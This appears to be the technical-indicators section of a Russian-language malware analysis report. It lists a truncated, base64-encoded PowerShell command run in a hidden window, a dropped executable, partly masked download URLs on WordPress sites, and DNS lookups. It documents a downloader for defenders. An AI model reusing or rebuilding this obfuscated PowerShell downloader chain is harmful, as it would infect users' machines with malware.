Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFAASABNAEMAYgBhAHoAPQAnAE4ATQBBAEMASQB1AHkAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBpAHQAeQBQAGAAUgBPAFQAbwBgAEMAbwBMACIAIAA9AC...
- %HOMEPATH%\117.exe
- %HOMEPATH%\117.exe
- http://tr###tory.com/wp-admin/zvxarrh54123/
- http://ze####rotary.org/wp-admin/omlbGyZY/
- http://www.ze####rotary.org/wp-admin/omlbGyZY/
- http://cr###al.co.jp/wp-content/T54s8h033/
- http://go#####sgraciously.com/wordpress/KMlzOaOj/
- DNS ASK tr###tory.com
- DNS ASK ca####hlight.com
- DNS ASK ze####rotary.org
- DNS ASK cr###al.co.jp
- DNS ASK go#####sgraciously.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFAASABNAEMAYgBhAHoAPQAnAE4ATQBBAEMASQB1AHkAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBpAHQAeQBQAGAAUgBPAFQAbwBgAEMAbwBMACIAIAA9AC...' (со скрытым окном)